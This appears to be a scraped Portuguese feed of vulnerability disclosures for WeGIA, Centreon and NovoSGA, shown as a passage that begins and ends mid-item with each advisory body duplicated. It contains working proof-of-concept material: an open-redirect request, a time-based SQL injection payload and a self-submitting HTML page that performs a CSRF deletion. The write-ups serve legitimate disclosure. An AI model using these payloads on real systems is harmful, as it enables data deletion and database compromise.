</span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=https%3A%2F%2Fgoogle.com HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/geral/editar_permissoes.php </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: {COOKIE} </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">O servidor aceita a solicitação elaborada e redireciona com sucesso a vítima para <code>https://google.com</code> em vez de restringir a navegação ao domínio do próprio aplicativo.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Phishing: Invasores podem induzir usuários a visitar sites maliciosos que imitam sites legítimos.</li> <li>Roubo de credenciais: Páginas de login falsas podem capturar credenciais de usuários.</li> <li>Distribuição de malware: As vítimas podem ser redirecionadas para sites que hospedam software malicioso.</li> <li>Danos à reputação: Os usuários podem perder a confiança na plataforma Wegia se forem vítimas de abuso em campanhas de phishing.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m99c-77f2-gpjx</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8429/ https://www.cvehunters.com/pt/p/cve-2025-8429/ <h2 id="cve-2025-8429-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8429: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8429" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8429</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de acesso à Ação ACL</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração de acesso à Ação ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-8429-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8429: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8429" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8429</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de acesso à Ação ACL</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração de acesso à Ação ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8429-centreon-web-all-versions-medium-severity-5119</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8430/ https://www.cvehunters.com/pt/p/cve-2025-8430/ <h2 id="cve-2025-8430-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8430: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8430" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8430</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Conectores de Comandos.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-8430-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8430: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8430" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8430</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Conectores de Comandos.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8430-centreon-web-all-versions-medium-severity-5118</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8459/ https://www.cvehunters.com/pt/p/cve-2025-8459/ <h2 id="cve-2025-8459-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8459: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8459" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8459</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios baixos pode injetar XSS na página "Monitorando Tempos de Inatividade Recorrentes".</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade "Neutralização Indevida de Entrada Durante a Geração de Páginas Web" (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos do agendador de tempos de inatividade recorrentes) permite XSS Armazenado. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-8459-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-8459: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8459" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8459</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios baixos pode injetar XSS na página "Monitorando Tempos de Inatividade Recorrentes".</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade "Neutralização Indevida de Entrada Durante a Geração de Páginas Web" (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos do agendador de tempos de inatividade recorrentes) permite XSS Armazenado. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8459-centreon-web-all-versions-high-severity-5117</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-11322/ https://www.cvehunters.com/pt/p/cve-2025-11322/ <h2 id="cve-2025-11322-vulnerabilidade-de-política-de-senhas-fraca-na-função-criar-novos-usuários">CVE-2025-11322: Vulnerabilidade de Política de Senhas Fraca na função Criar novos Usuários </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11322" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11322</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de registro de usuários do aplicativo Novosga. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como <code>123456</code>. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo não consegue impor uma política de senhas fortes. Como resultado, os usuários podem registrar contas com senhas fracas, comuns e conhecidas, comprometendo a segurança da autenticação da plataforma.</p><h2 id="cve-2025-11322-vulnerabilidade-de-política-de-senhas-fraca-na-função-criar-novos-usuários">CVE-2025-11322: Vulnerabilidade de Política de Senhas Fraca na função Criar novos Usuários </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11322" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11322</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de registro de usuários do aplicativo Novosga. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como <code>123456</code>. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo não consegue impor uma política de senhas fortes. Como resultado, os usuários podem registrar contas com senhas fracas, comuns e conhecidas, comprometendo a segurança da autenticação da plataforma.</p></p> <p>Componente vulnerável: <code>Registro de usuário / criação de senha</code></p> <h3 id="poc">PoC </h3><p style="text-align: justify;"> <ul> <li>Acesse a página de registro do usuário após efetuar login com a conta de Administrador.</li> <li>Crie uma nova conta de usuário com a senha <code>123456</code>.</li> <li>O aplicativo aceita a senha fraca sem restrições e cria a conta com sucesso.</li> </ul> </p> <p><img src="/p/cve-2025-11322/image.png" width="942" height="739" srcset="/p/cve-2025-11322/image_hu_5efc7146b11f1523.png 480w, /p/cve-2025-11322/image_hu_ad16b066d772cdf2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="127" data-flex-basis="305px" /></p> <p><img src="/p/cve-2025-11322/image-1.png" width="939" height="784" srcset="/p/cve-2025-11322/image-1_hu_6250a21d35ef1c30.png 480w, /p/cve-2025-11322/image-1_hu_2a40994e5a3ad755.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="119" data-flex-basis="287px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Aumento do risco de ataques de força bruta e de preenchimento de credenciais.</li> <li>Acesso não autorizado a contas de usuários ou administrativas.</li> <li>Aumento de privilégios por meio de contas comprometidas.</li> <li>Postura geral de segurança do aplicativo reduzida.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 06 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-61603/ https://www.cvehunters.com/pt/p/cve-2025-61603/ <h2 id="cve-2025-61603-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id_pet-do-endpoint-petprofile_petphp">CVE-2025-61603: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id_pet</code> do Endpoint <code>/pet/profile_pet.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61603" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61603</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_pet</code> do endpoint <code>/pet/profile_pet.php</code>. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_pet</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-61603-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id_pet-do-endpoint-petprofile_petphp">CVE-2025-61603: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id_pet</code> do Endpoint <code>/pet/profile_pet.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61603" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61603</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_pet</code> do endpoint <code>/pet/profile_pet.php</code>. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_pet</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/pet/profile_pet.php</code></p> <p>Parâmetro: <code>id_pet</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">+AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61603/image.png" width="1531" height="708" srcset="/p/cve-2025-61603/image_hu_d3891178922f3b57.png 480w, /p/cve-2025-61603/image_hu_9215cc27c0e46de.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="518px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-61604/ https://www.cvehunters.com/pt/p/cve-2025-61604/ <h2 id="cve-2025-61604-cross-site-request-forgery-csrf-na-exclusão-get-da-classe-almoxarifadocontrole-no-endpoint-controlphp">CVE-2025-61604: Cross-Site Request Forgery (CSRF) na exclusão (GET) da classe <code>AlmoxarifadoControle</code> no endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61604" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61604</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no aplicativo WeGIA. A operação de exclusão da entidade <code>Almoxarifado</code> é exposta via <code>HTTP GET</code> sem proteção CSRF, permitindo que um site de terceiros acione a ação usando a sessão autenticada da vítima.</p> <h2 id="poc">PoC </h2><p>Endpoint vulnerável: <code>GET /WeGIA/controle/control.php</code></p> <p>Parâmetros: <code>metodo</code>, <code>nomeClasse</code> e ​​<code>id_almoxarifado</code></p><h2 id="cve-2025-61604-cross-site-request-forgery-csrf-na-exclusão-get-da-classe-almoxarifadocontrole-no-endpoint-controlphp">CVE-2025-61604: Cross-Site Request Forgery (CSRF) na exclusão (GET) da classe <code>AlmoxarifadoControle</code> no endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61604" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61604</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no aplicativo WeGIA. A operação de exclusão da entidade <code>Almoxarifado</code> é exposta via <code>HTTP GET</code> sem proteção CSRF, permitindo que um site de terceiros acione a ação usando a sessão autenticada da vítima.</p> <h2 id="poc">PoC </h2><p>Endpoint vulnerável: <code>GET /WeGIA/controle/control.php</code></p> <p>Parâmetros: <code>metodo</code>, <code>nomeClasse</code> e ​​<code>id_almoxarifado</code></p> <p><img src="/p/cve-2025-61604/image.png" width="1498" height="644" srcset="/p/cve-2025-61604/image_hu_f5b0e3c8457f44d8.png 480w, /p/cve-2025-61604/image_hu_a02351acbaeffe3e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="232" data-flex-basis="558px" /></p> <p><img src="/p/cve-2025-61604/image-1.png" width="775" height="456" srcset="/p/cve-2025-61604/image-1_hu_fe77fb317ebe37c3.png 480w, /p/cve-2025-61604/image-1_hu_443e426826577324.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="169" data-flex-basis="407px" /></p> <p><strong>Navegação de nível superior (funciona mesmo com SameSite=Lax)</strong></p> <p>Hospede o arquivo abaixo de uma origem diferente e abra-o enquanto estiver conectado ao WeGIA (ex: <code>poc_csrf_get.html</code>):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp"><!doctype html></span> </span></span><span class="line"><span class="cl"><span class="p"><</span><span class="nt">html</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">form</span> <span class="na">id</span><span class="o">=</span><span class="s">"f"</span> <span class="na">method</span><span class="o">=</span><span class="s">"GET"</span> <span class="na">action</span><span class="o">=</span><span class="s">"https://sec.wegia.org:8000/WeGIA/controle/control.php"</span> <span class="na">target</span><span class="o">=</span><span class="s">"_self"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"metodo"</span> <span class="na">value</span><span class="o">=</span><span class="s">"excluir"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"nomeClasse"</span> <span class="na">value</span><span class="o">=</span><span class="s">"AlmoxarifadoControle"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"id_almoxarifado"</span> <span class="na">value</span><span class="o">=</span><span class="s">"{choose a ID}"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">form</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'f'</span><span class="p">).</span><span class="nx">submit</span><span class="p">();</</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">html</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="etapas-para-reproduzir">Etapas para Reproduzir: </h2><p style="text-align: justify;"> <ul> <li>Faça login no WeGIA com um usuário autorizado a excluir <code>Almoxarifado</code>.</li> <li>De outra origem (por exemplo, <code>http://127.0.0.1:8008</code>), abra o HTML PoC acima.</li> <li>Observe o WeGIA executando o fluxo de exclusão (por exemplo, erro de FK ou exclusão normal), comprovando que uma solicitação entre sites pode acionar a ação.</li> </ul> </p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Comprometimento da integridade: invasores podem induzir usuários privilegiados a realizar ações destrutivas visitando uma página controlada por eles.</li> <li>Possível perda de dados ou interrupção operacional se IDs não protegidos por restrições de FK forem visados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m</a></strong></em></p> <h2 